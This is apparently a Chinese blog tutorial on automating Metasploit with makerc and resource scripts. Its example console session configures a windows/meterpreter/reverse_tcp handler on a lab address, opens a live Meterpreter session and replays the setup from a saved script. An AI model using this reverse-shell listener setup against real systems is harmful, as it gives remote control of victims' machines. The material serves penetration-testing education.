# Metasploit资源脚本的使用方法
Metasploit可以通过资源脚本实现自动化——使用资源脚本可以免去手动设置选项,实现选项的自动化设置,从而节省配置模块选项和攻击载荷所花费的时间。
创建资源脚本有两种方法:手动创建脚本或使用makerc命令创建脚本。makerc命令将之前输入过的所有命令都保存到一个文件中,可以使用resource命令使用这个文件。
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.175.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.175.128:4444
[*] Sending stage (179779 bytes) to 192.168.175.130
[*] Meterpreter session 1 opened (192.168.175.128:4444 -> 192.168.175.130:1025) at 2019-01-25 23:27:58 +0800
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.175.130 - Meterpreter session 1 closed. Reason: User exit
msf5 exploit(multi/handler) > makerc
Usage: makerc <output rc file>
Save the commands executed since startup to the specified file.
msf5 exploit(multi/handler) > makerc multi_handler
[*] Saving last 8 commands to multi_handler ...
msf5 exploit(multi/handler) >
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
这里,我们通过设置攻击载荷和各种选项,成功启动了一个渗透模块handler,输入makerc命令就可以将这些命令保存到一个指定的文件中。在这个示例中是multi_handler文件,我们保存了最近使用的8条命令。
接下来,我们就要通过resource命令使用这个资源文件,达到选项的自动化设置,如下所示:
msf5 exploit(multi/handler) > resource multi_handler
[*] Processing /root/multi_handler for ERB directives.
resource (/root/multi_handler)> use exploit/multi/handler
resource (/root/multi_handler)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/multi_handler)> set LHOST 192.168.175.128
LHOST => 192.168.175.128
resource (/root/multi_handler)> set LPORT 4444
LPORT => 4444
resource (/root/multi_handler)> show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.175.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
resource (/root/multi_handler)> exploit
[*] Started reverse TCP handler on 192.168.175.128:4444
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
# 写在最后
如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!
